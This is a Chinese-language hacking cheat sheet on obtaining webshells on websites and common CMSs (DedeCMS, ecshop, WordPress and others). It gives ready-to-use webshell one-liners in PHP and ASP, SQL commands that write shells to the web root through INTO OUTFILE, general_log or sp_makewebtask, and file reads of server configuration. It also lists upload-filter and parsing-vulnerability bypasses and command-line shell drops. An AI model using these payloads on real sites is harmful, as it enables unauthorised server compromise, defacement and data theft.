大纲

　　  管理员权限拿shell

普通权限拿shell

常见cms拿shell

进后台主要是可以对网站前台的内容，样式等做操作，要改脚本的内容的权限只有在webshell的权限下才可以（某些情况除外）。

管理员权限拿shell

需要有管理员权限才可以拿shell

通常需要登录后台执行相关操作

直接上传拿shell

国内多对上传类型进行了限制，需要在进行绕过操作

示例：织梦后台查找（改过之后的）

Google intext:powerd by DedeCMSV57_UTD8_SP2

DEDECMS V5.7

拿到织梦后台，基本就拿到了shell

文件式管理器->可修改网站脚本内容，也可以上传脚本

若遇见文件权限问题，可以修改文件名为../往上级目录翻

数据库备份拿shell

网站上传的文件后缀名进行过滤，不允许上传脚本类型文件，如asp，php，jsp，aspx等，二网站具有数据库备份的功能，这时我们可以将webshell格式先改为可上传的格式，然后，将找到上传后的文件路径通过数据库备份，将文件备份为脚本格式。

示例：南方数据 v7.0    良精通用企业网站管理系统

有时会将系统管理中的按钮删除，但是功能是依旧存在的，（脚本文件名，数据库备份：Manage_backup.asp）可以在网站检查中，将其他连接的地址改为数据库备份的地址。阉割版的网站，常见于ecshop，wordpress，dedecms，aspcms，良精，帝国，南方，phpv9，科讯。可以本地下载完整的网站源码，自己搭建，对目标网站尝试修改拼接。

突破上传拿shell

本地js验证上传

服务器mime上传

服务器白名单上传

服务器黑名单上传

服务器filepath上传

双文件上传

%00截断上传

上传其他脚本类型拿shell

修改网站上传类型配置拿shell

有的网站在网站上传类型中限制了上传脚本类型文件，可以添加上传文件类型，如php，jsp，asp等拿shell

利用解析漏洞拿shell

1、IIS 5.x/6.0解析漏洞          目录解析，分号解析，畸形文件名解析

2、IIS 7.0/7.5，Nginx<8.03畸形文件名解析漏洞，php文件解析漏洞

3、Nginx<8.03空字节代码执行漏洞

4、Apache解析漏洞

利用编辑器漏洞拿shell

常见的编辑器有fckeditor，ewebeditor，cheditor

网站配置插马拿shell

通过找到网站默认配置，将一句话插入到网站配置中，可以事先下载网站源码，查看过滤规则，防止插马失败（"%><%eval request(“abc”)%><%’）根据网站源码进行符号匹配。

通过编辑模板拿shell

1、通过对网站的模板进行编辑，写入一句话，然后生成脚本文件拿shell

2、通过将木马添加到压缩文件，把名字改为网站模板类型，上传到网站服务器，拿shell

示例：ecshop

模板管理——库项目管理——配送方式

写入php脚本验证：<?php phpinfo();?>

访问/myship.php发现执行了phpinfo，之后就可以写入一句话，菜刀连接。注意：有时在后面有”?>”时，不会成功，可以去掉再尝试一下。

数据库管理——SQL查询——输入”use mysql”让报错，爆出路径——select “<?php phpinfo();?>” into outfile ‘地址\\x.php’

注意：Windows中，斜杠要用两个反斜杠，Linux路径用单个斜杠

数据库管理——数据库备份——自定义备份（配合IIS6.0解析漏洞）创建用户（用户里面写入一句话）——放在ecs_users表中——备份——文件名为u.asp;.sql

上传插件拿shell

一些网站为了增加某些功能会在后台添加一些插件来实现，我们可以把木马添加到安装的插件中上传服务器拿shell，常见的有博客类网站dz论坛等

示例：WordPress-V4.2.2

搭建时要先创建数据库

phpstudy——mysql——create database wpp;

插件——已安装的插件——安装插件——下载一个正常的插件，将木马放在里面，一起上传，安装——找上传目录

数据库执行拿shell

可通过数据库执行命令导出一句话到网站根目录拿shell，access数据库导出一般需要利用解析漏洞xx.asp;.xml

sqlserver导出：;exec%20sp_makewebtask%20%20%27c:\zhetpub\wwwroot\ms\x1.asp%27,%27select%27%27<%execute(request(“cmd”))%>%27%27%27

mysql命令导出shell

create TABLE study (cmd text Not NULL);

insert INTO study (cmd) VALUES(‘<?php eval($_POST[cmd])?>’);

select cmd from study into outfile ‘D:/php/www/htdocs/test/seven.php’;

drop TABLE IF EXISTS study;

或

use mysql;

create table x (packet text) type=MYISaM;

insert into x (packet) values(‘<pre><body><?php @system($_GET[“cmd”]);?></body></pre>’)

select x into outfile ‘d:\php\xx.php’

或

select ‘<?php eval($_POST[cmd]);?>’ into outfile ‘c:/inetpub/wwwroot/mysql.php/1.php’

1.进入phpmyadmin

2.知道网站路径

3.直接执行SQL语句导入shell

注：有时可能出现不允许直接导shell

解决方法：首页——变量——general lag 编辑——ON——general log file 编辑 D:\phpstudy\www\ba.php——SQL——一句话用引号引起来——执行——报错——生成日志，利用日志记录生成shell

4.不知道路径时——推理路径

首页——变量——mysql的集成环境路径——apache的路径也知道了——D:\phpstudy\Apache\conf\httpd.conf——找个数据库——创建表：

create table a(a text);

开外链

load data infile “D:/phpstudy/Apache/conf/httpd.conf” into table  a;

导出SQL搜索documentroot

路径推理

D:/phpstudy/Apache/conf/httpd.conf                       配置文件的路径，找网站根目录

Apache

/usr/local/mysql

/usr/local/apache/conf/httpd.conf

/usr/local/httpd/conf/httpd.conf

/etc/httpd/conf/httpd.conf

/usr/local/apache2/conf/httpd.conf

ngnix

/usr/local/nginx/conf/nginx.conf

phpmyadmin一般在网站根目录下

当找不到配置文件时，可以读大文件，由于文件太大会报错，有可能会报出phpmyadmin的路径。

文件包含拿shell    多用于上传大马

先将webshell改为txt文件上传，然后上传一个脚本文件包含该txt文件，可绕过waf拿shell

asp包含

1.<!--#include file=”123.jpg”-->

2.调用的文件必须和被调用的文件在同一目录，否则找不到

3.如果找不到，用下面的语句

<--#include virtual=”文件所在目录/123.jpg”-->

php包含

<?php include(“123.jpg”)?>

命令执行拿shell

echo ^<^?php @eval($_POST[‘abc’]);?^>^ >c:\1.php

echo ^<^?php @eval($_POST[‘abc’]);?^>^ >c:\1.php

^<^%eval request(“abc”)%^>^ >c:\1.php

普通用户前台拿shell

0day拿shell

IIS写权限拿shell

命令执行拿shell

通过注入漏洞拿shell

　　  前台用户头像上传拿shell

strusts2拿shell

java反序列拿shell